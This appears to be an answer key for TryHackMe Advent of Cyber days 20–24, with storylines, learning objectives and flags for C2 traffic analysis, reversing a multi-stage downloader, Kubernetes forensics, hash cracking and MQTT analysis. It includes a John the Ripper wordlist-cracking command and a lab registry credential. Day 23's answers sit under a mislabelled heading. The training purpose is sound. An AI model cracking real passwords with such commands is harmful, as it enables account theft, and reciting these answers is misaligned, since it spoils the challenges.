McSkidy smiled. “Thanks, Glitch, but I’ve got this.“
Learning Objectives
- Investigate network traffic using Wireshark
- Identify indicators of compromise (IOCs) in captured network traffic
- Understand how C2 servers operate and communicate with compromised systems
TryHackMe Advent of Cyber Day 20 Answers
Q1) What was the first message the payload sent to Mayor Malware’s C2?
Answers :- I am in Mayor!
Q2) What was the IP address of the C2 server?
Answers :- 10.10.123.224
Q3) What was the command sent by the C2 server to the target machine?
Answers :- whoami
Q4) What was the filename of the critical file exfiltrated by the C2 server?
Answers :- credentials.txt
Q5) What secret message was sent back to the C2 in an encrypted format through beacons?
Answers :- THM_Secret_101
TryHackMe Advent of Cyber Day 21: HELP ME…I’m REVERSE ENGINEERING!
Day 21 Storyline
McSkidy’s alert dashboard lit up with an unusual alert. A file-sharing web application built by Glitch had triggered a security warning. Glitch had been working hard during this season’s SOC-mas after the last scare with the Yule Log Exploit, but this new alert caused McSkidy to question his intentions.
McSkidy began to investigate. It seemed the source of the alert came from a binary file that made its way to the web app’s backend. It did not belong there and had some anomalous activity. The binary was compiled with .NET. This whole setup seemed quite unusual, and with Glitch working on the latest security updates, McSkidy was filled with suspicion.
As McSkidy continued her investigation, Glitch rushed into the room: “I swear I did not put it there! I was testing defences, but I wouldn’t go that far!
McSkidy reassured him, “This doesn’t look like your work. Let’s get to the bottom of this. Put on your decompiling hat, and let’s see what we are dealing with.”
Learning Objectives
- Understanding the structure of a binary file
- The difference between Disassembly vs Decompiling
- Familiarity with multi-stage binaries
- Practically reversing a multi-stage binary
TryHackMe Advent of Cyber Day 21 Answers
1)What is the function name that downloads and executes files in the WarevilleApp.exe?
Ans: DownloadAndExecuteFile
2)Once you execute the WarevilleApp.exe, it downloads another binary to the Downloads folder. What is the name of the binary?
Ans: explorer.exe
3)What domain name is the one from where the file is downloaded after running WarevilleApp.exe?
Ans: mayorc2.thm
4)The stage 2 binary is executed automatically and creates a zip file comprising the victim’s computer data; what is the name of the zip file?
Ans: CollectedFiles.zip
5)What is the name of the C2 server where the stage 2 binary tries to upload files?
Ans: anonymousc2.thm
TryHackMe Advent of CyberDay 22: It’s because I’m kubed, isn’t it?
Learning Objectives
Learn how DFIR can be done in a Kubernetes environment using log analysis.
Learn about Kubernetes, what it is and why it is used.
Learn about DFIR, and the challenges that come with DFIR in an ephemeral environment.
TryHackMe Advent of CyberDay 22 Answers
Q1)What is the name of the webshell that was used by Mayor Malware?
Answers:- shelly.php
Q2)What file did Mayor Malware read from the pod?
Answers:- db.php
Q3)What tool did Mayor Malware search for that could be used to create a remote connection from the pod?
Answers:- nc
Q4)What IP connected to the docker registry that was unexpected?
Answers:- 10.10.130.253
Q5)At what time is the first connection made from this IP to the docker registry?
Answers:- 29/Oct/2024:10:06:33 +0000
Q6)At what time is the updated malicious image pushed to the registry?
Answers:- 29/Oct/2024:12:34:28 +0000
Q7)What is the value stored in the “pull-creds” secret?
Answers:- {“auths”:{“http://docker-registry.nicetown.loc:5000“:{“username”:”mr.nice”,”password”:”Mr.N4ughty”,”auth”:”bXIubmljZTpNci5ONHVnaHR5″}}}
TryHackMe Advent of CyberDay 23: You wanna know what happens to your hashes?
Day 23 Storyline
Glitch has been investigating how Mayor Malware funds his shady operations for quite some time. Recently, the Mayor disposed of various old electronic equipment; one was an old tablet with a cracked screen. Being an avid connoisseur of active and passive reconnaissance who does not mind “dumpster diving” for the greater good, Glitch quickly picked it up before the garbage truck. Surprisingly, despite being in a terrible condition with a cracked and hazy screen, the tablet still turns on. Browsing through the various files, one PDF file that caught his attention was password-protected. It is time you work with Glitch to discover the password and uncover any evidence lurking there.
Learning Objectives
By finishing today’s task, you will learn about:
- Hash functions and hash values
- Saving hashed passwords
- Cracking hashes
- Finding the password of a password-protected document
TryHackMe Advent of CyberDay 24 Answers
Crack the hash value stored in hash1.txt. What was the password?
Run the command
john — format=raw-sha256 — rules=wordlist — wordlist=/usr/share/wordlists/rockyou.txt hash1.txt
Ans: fluffycat12
What is the flag at the top of the private.pdf file?
Ans: THM{do_not_GET_CAUGHT}
TryHackMe Advent of Cyber Day 24: You can’t hurt SOC-mas, Mayor Malware!
Day 24 Storyline
The city of Wareville has invested in smart lights and heating, ventilation, and air conditioning (HVAC). Oh, it was so easy to control the lights and heating remotely. Following the recent incidents, McSkidy started monitoring these smart devices’ communication protocols. Not long after the lights and heating were up and running, Mayor Malware figured out how these devices were controlled and sabotaged them. Luckily, McSkidy was one step ahead and picked up the malicious commands that had been sent. Can you help McSkidy figure out which commands were sent? We can then use our findings to update the devices’ configuration and save the day!
Learning Objectives
In this task, you will learn about:
- The basics of the MQTT protocol
- How to use Wireshark to analyze MQTT traffic
- Reverse engineering a simple network protocol
TryHackMe Advent of Cyber Day 24 Answers
What is the flag?
Ans: THM{Ligh75on-day54ved}
